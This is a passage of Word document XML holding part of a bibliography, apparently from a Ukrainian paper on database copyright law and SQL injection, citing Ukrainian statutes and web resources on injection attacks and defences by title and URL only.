        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Авторское право [Електронний ресурс] / Портал : –  Режим доступу \www/ URL: http://www.uacrr.org/shho-take-avtorske-pravo/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A39777C" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Закон України «Про авторське право і суміжні права» від 23 грудня 1993 року [Електронний ресурс] / Портал : Верховна Рада України. – Режим доступу \www/ URL: http://www.zakon2. rada.gov.ua/laws/show/3792-12. – Заголовок з екрану, доступ вільний, 31.10.2012. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A99E7F" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Толпєєв А.С. Проблема защиты авторского права на базы данных [Електронний ресурс] / Портал : Международная полицейская корпорация гражданской безопасности. – Режим доступу \www/ URL: http://www.mpkgb-mykolaiv.at.ua/publ/1-1-0-1. – Заголовок з екрану, доступ вільний, 31.10.2012. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B324ECC" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Закон України в редакції від 10 липня 2003 р. № 1098-IV «Про розповсюдження примірників аудіовізуальних творів, фонограм, відеограм, комп’ютерних програм, баз даних». http://zakon2.rada.gov.ua/laws/card/1098-15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2405A7BA" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Казакова Н.Ф., Щербина Ю.В. Проблеми правового забезпечення захисту баз даних</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08004638" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Проект Закону « Про внесення змін до деяких законодавчих актів України щодо правового забезпечення відкритості баз даних та прозорості реєстраційних процедур». </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9275F0" w14:textId="77777777" w:rsidR="005240D2" w:rsidRPr="00787381" w:rsidRDefault="005240D2" w:rsidP="005240D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787381">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">http://w1.c1.rada.gov.ua/pls/zweb2/webproc4_1?pf3511=54874 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A77FB9" w14:textId="1E43F87C" w:rsidR="005240D2" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Про основні засади забезпечення кібербезпеки України [Текст] : Закон України № 2163-</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>VIII</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> від 5 жовтня 2017 р. / Верховна Рада України // Відомості Верховної Ради України – 2017. – № 45. – Ст. 403.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C1930" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL ін’єкції в MySQL сервері [Електронний ресурс] режим доступу: https://www.securitylab.ru/contest/212083.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF33D5" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> MySQL 3 Error Based SQLi [Електронний ресурс] режим доступу: https://rdot.org/forum/showthread.php?t=503</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380453B6" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Do stored procedures protect against SQL Injection? </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Електронний ресурс] режим доступу: https://blogs.msdn.microsoft.com/brian_swan/2011/02/16/do-stored-procedures-protect-against-sql-injection/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C4516" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comment injection Attack [Електронний ресурс] режим доступу: https://www.owasp.org/index.php/Comment_Injection_Attack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C319EA" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Using UNION [Електронний ресурс] режим доступу: http://www.sqlinjection.net/union/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C5CCF9" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="005027FB" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Blind SQL Injection Automation Techniques [</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режим</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступу</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10553152" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="005027FB" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boolean Exploitation Technique to exploit SQL Injection Vulnerability | INJECTION ATTACKS – PART 7 [</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режим</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступу</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: https://www.hackingloops.com/boolean-exploitation-technique-to/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F51C77E" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="005027FB" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Methodology and Analysis for Various SQL Injection Techniques [</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режим</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступу</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: http://www.ijcset.com/docs/IJCSET14-05-04-067.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5F0928" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="005027FB" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Testing for SQL Injection [</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режим</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступу</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF4250" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Advanced SQL Injection [Електронний ресурс] режим доступу:  https://nvisium.com/resources/blog/2015/06/17/advanced-sql-injection.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFB76E" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL Injection Cheat Sheet [Електронний ресурс] режим доступу:   https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCAB8F" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="005027FB" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1276"/>
          <w:tab w:val="left" w:pos="2615"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Advanced evasion techniques for defeating SQL injection Input validation mechanisms [</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Електронний</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режим</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6169">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>доступу</w:t>
      </w:r>
      <w:r w:rsidRPr="005027FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: https://jeannotclement.wordpress.com/2011/01/16/advanced-evasion-technique/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040E7A6C" w14:textId="77777777" w:rsidR="00FB6169" w:rsidRPr="00FB6169" w:rsidRDefault="00FB6169" w:rsidP="00FB6169">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
